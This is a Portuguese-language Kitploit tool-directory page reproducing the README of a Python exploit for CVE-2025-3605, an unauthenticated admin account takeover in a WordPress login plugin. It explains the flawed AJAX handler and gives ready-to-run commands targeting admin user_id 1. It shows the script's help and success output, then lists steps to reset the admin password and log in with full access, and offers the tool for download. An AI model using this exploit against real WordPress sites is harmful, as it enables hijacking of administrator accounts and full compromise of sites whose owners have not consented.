Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3605 — WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 é vulnerável à escalação de privilégios. | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-3605
Escalada de PrivilégiosAtaques de SenhaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-3605

CVE-2025-3605

WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 é vulnerável à escalação de privilégios.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚀 Guia de Exploração do CVE-2025-3605

🛡️ Resumo da Vulnerabilidade

O plugin Frontend Login and Registration Blocks para WordPress (versões <= 1.0.7) é vulnerável a escalada de privilégios via tomada de conta.
O problema ocorre porque o plugin não valida a identidade do usuário ao atualizar detalhes sensíveis como e-mail através da função flr_blocks_user_settings_handle_ajax_callback().

✅ Impacto:
Um atacante não autenticado pode alterar o e-mail do administrador, acionar o processo de "Esqueci a Senha" e redefinir a senha do administrador, obtendo controle total.


💥 Prova de Conceito (PoC)

O script Python incluído automatiza o processo de exploração visando o endpoint AJAX vulnerável:

root@kitploit:~
/wp-admin/admin-ajax.php

Ele atualiza o e-mail do usuário alvo (normalmente user_id 1 para admin) para um e-mail controlado pelo atacante.


📦 Script Incluído

Nome do arquivo: CVE-2025-3605.py

root@kitploit:~
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]

✅ Valores padrão:

  • --user_id: 1 (admin padrão)
  • --mail: [email protected]

🖥️ Uso e Ajuda

Para ver o menu de ajuda, execute:

root@kitploit:~
python CVE-2025-3605.py --help

Saída:

root@kitploit:~
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]

Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  --url, -u URL         Target URL, e.g., http://192.168.100.74:888/wordpress
  --user_id, -id USER_ID
                        User ID to target (default: 1)
  --mail, -mail MAIL    Email to set (default: [email protected])

✅ Exemplo de execução:

root@kitploit:~
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]

🎯 Saída Esperada

✅ Em caso de sucesso:

root@kitploit:~
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )

❌ Em caso de falha:

root@kitploit:~
[!] Exploit failed. HTTP Status: 400
[!] Response: 0

🔑 Após a Exploração

1️⃣ Navegue até:

root@kitploit:~
http://target-site/wordpress/wp-login.php

2️⃣ Insira o novo e-mail que você definiu ([email protected]).

3️⃣ Solicite a redefinição de senha.

4️⃣ Defina uma nova senha.

5️⃣ Faça login como administrador e aproveite o acesso total.


⚠️ Aviso Legal

Este exploit e script são fornecidos apenas para fins educacionais e de testes autorizados.
Qualquer uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.


Por: Khaled Alenazi (Nxploited)

Baixar ferramenta